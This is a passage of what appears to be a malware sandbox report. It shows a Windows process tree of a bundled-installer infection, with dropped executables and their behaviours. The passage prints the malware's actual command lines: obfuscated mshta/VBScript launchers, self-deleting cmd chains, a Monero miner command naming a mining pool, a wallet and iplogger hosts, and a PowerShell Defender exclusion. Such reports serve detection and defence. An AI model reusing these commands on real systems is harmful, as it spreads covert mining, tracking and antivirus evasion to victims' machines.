                                                          PID:3296
                                                        • C:\Users\Admin\AppData\Roaming\8054913.exe
                                                          "C:\Users\Admin\AppData\Roaming\8054913.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4724
                                                      • C:\Users\Admin\Documents\MkUJBpTtAfGlkX4du8wRlRNU.exe
                                                        "C:\Users\Admin\Documents\MkUJBpTtAfGlkX4du8wRlRNU.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:1836
                                                        • C:\Users\Admin\Documents\MkUJBpTtAfGlkX4du8wRlRNU.exe
                                                          C:\Users\Admin\Documents\MkUJBpTtAfGlkX4du8wRlRNU.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4748
                                                      • C:\Users\Admin\Documents\P8obkqIKLX5nW5yam1WFJZus.exe
                                                        "C:\Users\Admin\Documents\P8obkqIKLX5nW5yam1WFJZus.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2784
                                                        • C:\Users\Admin\Documents\P8obkqIKLX5nW5yam1WFJZus.exe
                                                          "C:\Users\Admin\Documents\P8obkqIKLX5nW5yam1WFJZus.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4656
                                                      • C:\Users\Admin\Documents\aRyMzRcSheB9cpIH1opURDLk.exe
                                                        "C:\Users\Admin\Documents\aRyMzRcSheB9cpIH1opURDLk.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:4784
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im aRyMzRcSheB9cpIH1opURDLk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\aRyMzRcSheB9cpIH1opURDLk.exe" & del C:\ProgramData\*.dll & exit
                                                          3⤵
                                                            PID:4492
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im aRyMzRcSheB9cpIH1opURDLk.exe /f
                                                              4⤵
                                                              • Kills process with taskkill
                                                              PID:5464
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              4⤵
                                                              • Delays execution with timeout.exe
                                                              PID:6032
                                                        • C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe
                                                          "C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:4772
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                            3⤵
                                                              PID:4824
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\kU7E9j21REUeB3zXnaaIg2iF.exe" ) do taskkill -f -iM "%~NxA"
                                                                4⤵
                                                                  PID:5828
                                                                  • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                    hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:6064
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                      6⤵
                                                                        PID:6140
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                          7⤵
                                                                            PID:6400
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                          6⤵
                                                                            PID:6748
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill -f -iM "kU7E9j21REUeB3zXnaaIg2iF.exe"
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:6088
                                                                  • C:\Users\Admin\Documents\DQ9LVdVeGrXrZKnsuIxISMgN.exe
                                                                    "C:\Users\Admin\Documents\DQ9LVdVeGrXrZKnsuIxISMgN.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:3884
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-7PG36.tmp\DQ9LVdVeGrXrZKnsuIxISMgN.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-7PG36.tmp\DQ9LVdVeGrXrZKnsuIxISMgN.tmp" /SL5="$3029C,138429,56832,C:\Users\Admin\Documents\DQ9LVdVeGrXrZKnsuIxISMgN.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:5148
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ELOT0.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ELOT0.tmp\Setup.exe" /Verysilent
                                                                        4⤵
                                                                          PID:6304
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:6776
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-L0GQF.tmp\Stats.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-L0GQF.tmp\Stats.tmp" /SL5="$202CA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                              6⤵
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:7064
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-333UA.tmp\builder.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-333UA.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                7⤵
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5668
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                            5⤵
                                                                              PID:6836
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-A75NS.tmp\WEATHER Manager.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-A75NS.tmp\WEATHER Manager.tmp" /SL5="$2038E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                6⤵
                                                                                  PID:6176
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-3QNMF.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-3QNMF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                    7⤵
                                                                                    • Loads dropped DLL
                                                                                    • Enumerates connected drives
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:196
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-3QNMF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-3QNMF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480183 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                      8⤵
                                                                                        PID:6876
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6888
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                    6⤵
                                                                                      PID:7100
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6880
                                                                                    • C:\Users\Admin\AppData\Roaming\7745696.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\7745696.exe"
                                                                                      6⤵
                                                                                        PID:1056
                                                                                      • C:\Users\Admin\AppData\Roaming\2485310.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\2485310.exe"
                                                                                        6⤵
                                                                                          PID:6168
                                                                                        • C:\Users\Admin\AppData\Roaming\2066600.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\2066600.exe"
                                                                                          6⤵
                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                          PID:6580
                                                                                        • C:\Users\Admin\AppData\Roaming\2206378.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\2206378.exe"
                                                                                          6⤵
                                                                                            PID:4936
                                                                                          • C:\Users\Admin\AppData\Roaming\2179963.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\2179963.exe"
                                                                                            6⤵
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:3364
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          PID:6936
                                                                                          • C:\Users\Admin\Documents\7E56Htr3LTU3WJkcS4aGGvrp.exe
                                                                                            "C:\Users\Admin\Documents\7E56Htr3LTU3WJkcS4aGGvrp.exe"
                                                                                            6⤵
                                                                                              PID:6564
                                                                                              • C:\Users\Admin\Documents\7E56Htr3LTU3WJkcS4aGGvrp.exe
                                                                                                "C:\Users\Admin\Documents\7E56Htr3LTU3WJkcS4aGGvrp.exe"
                                                                                                7⤵
                                                                                                  PID:7984
                                                                                              • C:\Users\Admin\Documents\kRr8inqWsEFWAi8vkW2Lp14T.exe
                                                                                                "C:\Users\Admin\Documents\kRr8inqWsEFWAi8vkW2Lp14T.exe"
                                                                                                6⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Loads dropped DLL
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:6748
                                                                                              • C:\Users\Admin\Documents\ovsU77Nt_ZGK607F6mLPvso8.exe
                                                                                                "C:\Users\Admin\Documents\ovsU77Nt_ZGK607F6mLPvso8.exe"
                                                                                                6⤵
                                                                                                  PID:5892
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\OVSU77~1.DLL,s C:\Users\Admin\DOCUME~1\OVSU77~1.EXE
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:9128
                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\OVSU77~1.DLL,eDs9QmtBOTQ=
                                                                                                      8⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks processor information in registry
                                                                                                      • Modifies system certificate store
                                                                                                      PID:8152
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\OVSU77~1.DLL
                                                                                                        9⤵
                                                                                                          PID:7304
                                                                                                  • C:\Users\Admin\Documents\KtOXD0mIFa9ETrq2jsJyDe6v.exe
                                                                                                    "C:\Users\Admin\Documents\KtOXD0mIFa9ETrq2jsJyDe6v.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:7400
                                                                                                  • C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                    "C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe"
                                                                                                    6⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:7500
                                                                                                    • C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                      C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                      7⤵
                                                                                                        PID:7656
                                                                                                      • C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                        C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                        7⤵
                                                                                                          PID:8016
                                                                                                        • C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                          C:\Users\Admin\Documents\nP2CZQEufidg5PVx8Nm8jovj.exe
                                                                                                          7⤵
                                                                                                            PID:7184
                                                                                                        • C:\Users\Admin\Documents\Xe2o1hEDQhKicx9xKMe932Rd.exe
                                                                                                          "C:\Users\Admin\Documents\Xe2o1hEDQhKicx9xKMe932Rd.exe"
                                                                                                          6⤵
                                                                                                            PID:7392
                                                                                                            • C:\Users\Admin\Documents\Xe2o1hEDQhKicx9xKMe932Rd.exe
                                                                                                              "C:\Users\Admin\Documents\Xe2o1hEDQhKicx9xKMe932Rd.exe" -q
                                                                                                              7⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:3136
                                                                                                          • C:\Users\Admin\Documents\V6Ji1aWqipIdNLOJxTZmI9_D.exe
                                                                                                            "C:\Users\Admin\Documents\V6Ji1aWqipIdNLOJxTZmI9_D.exe"
                                                                                                            6⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:6008
                                                                                                          • C:\Users\Admin\Documents\E4EGo2KRPqa3ol5WF_daXNmk.exe
                                                                                                            "C:\Users\Admin\Documents\E4EGo2KRPqa3ol5WF_daXNmk.exe"
                                                                                                            6⤵
                                                                                                              PID:4492
                                                                                                            • C:\Users\Admin\Documents\rGb6lKTKeB63wV1xO0Tq_EOn.exe
                                                                                                              "C:\Users\Admin\Documents\rGb6lKTKeB63wV1xO0Tq_EOn.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:6980
                                                                                                              • C:\Users\Admin\Documents\rGb6lKTKeB63wV1xO0Tq_EOn.exe
                                                                                                                C:\Users\Admin\Documents\rGb6lKTKeB63wV1xO0Tq_EOn.exe
                                                                                                                7⤵
                                                                                                                  PID:8152
                                                                                                              • C:\Users\Admin\Documents\xxwkEqABC9kNN45fzj5mtf2u.exe
                                                                                                                "C:\Users\Admin\Documents\xxwkEqABC9kNN45fzj5mtf2u.exe"
                                                                                                                6⤵
                                                                                                                  PID:4260
                                                                                                                • C:\Users\Admin\Documents\rTR72JQPsnwnz5Az3ZiNag6n.exe
                                                                                                                  "C:\Users\Admin\Documents\rTR72JQPsnwnz5Az3ZiNag6n.exe"
                                                                                                                  6⤵
                                                                                                                    PID:4876
                                                                                                                    • C:\Users\Admin\Documents\rTR72JQPsnwnz5Az3ZiNag6n.exe
                                                                                                                      "C:\Users\Admin\Documents\rTR72JQPsnwnz5Az3ZiNag6n.exe"
                                                                                                                      7⤵
                                                                                                                        PID:6840
                                                                                                                    • C:\Users\Admin\Documents\quKYUR6XdSm1yxqdoHaibXye.exe
                                                                                                                      "C:\Users\Admin\Documents\quKYUR6XdSm1yxqdoHaibXye.exe"
                                                                                                                      6⤵
                                                                                                                        PID:5768
                                                                                                                      • C:\Users\Admin\Documents\ZGlk8ZxWd0BjhOwzUw58TqBm.exe
                                                                                                                        "C:\Users\Admin\Documents\ZGlk8ZxWd0BjhOwzUw58TqBm.exe"
                                                                                                                        6⤵
                                                                                                                          PID:5868
                                                                                                                        • C:\Users\Admin\Documents\yQeMe949GiiRQrCLvB6q3Yfa.exe
                                                                                                                          "C:\Users\Admin\Documents\yQeMe949GiiRQrCLvB6q3Yfa.exe"
                                                                                                                          6⤵
                                                                                                                            PID:6772
                                                                                                                          • C:\Users\Admin\Documents\pQ8D9HDktrZpHP5ONta9xHff.exe
                                                                                                                            "C:\Users\Admin\Documents\pQ8D9HDktrZpHP5ONta9xHff.exe"
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:7092
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im pQ8D9HDktrZpHP5ONta9xHff.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pQ8D9HDktrZpHP5ONta9xHff.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              7⤵
                                                                                                                                PID:8100
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im pQ8D9HDktrZpHP5ONta9xHff.exe /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:684
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  8⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:7256
                                                                                                                            • C:\Users\Admin\Documents\za4x4jM7gVxoyMrAT0vKYgkO.exe
                                                                                                                              "C:\Users\Admin\Documents\za4x4jM7gVxoyMrAT0vKYgkO.exe"
                                                                                                                              6⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:7024
                                                                                                                            • C:\Users\Admin\Documents\9ZxLkPHFGD7OYv4xO_mG9pc6.exe
                                                                                                                              "C:\Users\Admin\Documents\9ZxLkPHFGD7OYv4xO_mG9pc6.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3980
                                                                                                                              • C:\Users\Admin\AppData\Roaming\5282838.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\5282838.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:5544
                                                                                                                                • C:\Users\Admin\AppData\Roaming\6461600.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6461600.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                  PID:5844
                                                                                                                                • C:\Users\Admin\AppData\Roaming\5571348.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5571348.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:8204
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2588171.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2588171.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:8296
                                                                                                                                  • C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe
                                                                                                                                    "C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4352
                                                                                                                                      • C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe
                                                                                                                                        C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe
                                                                                                                                        7⤵
                                                                                                                                          PID:1156
                                                                                                                                        • C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe
                                                                                                                                          C:\Users\Admin\Documents\4p0mlusJQy4n9R3d_g9KvBJC.exe
                                                                                                                                          7⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:6176
                                                                                                                                      • C:\Users\Admin\Documents\WvtvNtzCkEZZz1In3nadXCB_.exe
                                                                                                                                        "C:\Users\Admin\Documents\WvtvNtzCkEZZz1In3nadXCB_.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:7560
                                                                                                                                          • C:\Users\Admin\Documents\WvtvNtzCkEZZz1In3nadXCB_.exe
                                                                                                                                            "C:\Users\Admin\Documents\WvtvNtzCkEZZz1In3nadXCB_.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:5844
                                                                                                                                          • C:\Users\Admin\Documents\4R1_eHhx7Vx3hOGLbov8YFss.exe
                                                                                                                                            "C:\Users\Admin\Documents\4R1_eHhx7Vx3hOGLbov8YFss.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:7636
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 4R1_eHhx7Vx3hOGLbov8YFss.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4R1_eHhx7Vx3hOGLbov8YFss.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                              7⤵
                                                                                                                                                PID:8556
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /im 4R1_eHhx7Vx3hOGLbov8YFss.exe /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:8876
                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  timeout /t 6
                                                                                                                                                  8⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:2748
                                                                                                                                            • C:\Users\Admin\Documents\QJK3760g7botsVFTvHx0pub5.exe
                                                                                                                                              "C:\Users\Admin\Documents\QJK3760g7botsVFTvHx0pub5.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:7548
                                                                                                                                            • C:\Users\Admin\Documents\nB9X5BoXiYHlJKdCk9JeFLQI.exe
                                                                                                                                              "C:\Users\Admin\Documents\nB9X5BoXiYHlJKdCk9JeFLQI.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              PID:7676
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im nB9X5BoXiYHlJKdCk9JeFLQI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\nB9X5BoXiYHlJKdCk9JeFLQI.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                7⤵
                                                                                                                                                  PID:8872
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /im nB9X5BoXiYHlJKdCk9JeFLQI.exe /f
                                                                                                                                                    8⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:8480
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 6
                                                                                                                                                    8⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:6224
                                                                                                                                              • C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe
                                                                                                                                                "C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:7756
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                    7⤵
                                                                                                                                                      PID:6756
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\efl7AmlCyVMmsd0bSkdWIeZD.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:8892
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                            9⤵
                                                                                                                                                              PID:8408
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:8180
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:8232
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:4876
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill -f -iM "efl7AmlCyVMmsd0bSkdWIeZD.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:6660
                                                                                                                                                          • C:\Users\Admin\Documents\QJrwXGh_jz1rOgzfQE7Sq51d.exe
                                                                                                                                                            "C:\Users\Admin\Documents\QJrwXGh_jz1rOgzfQE7Sq51d.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Checks whether UAC is enabled
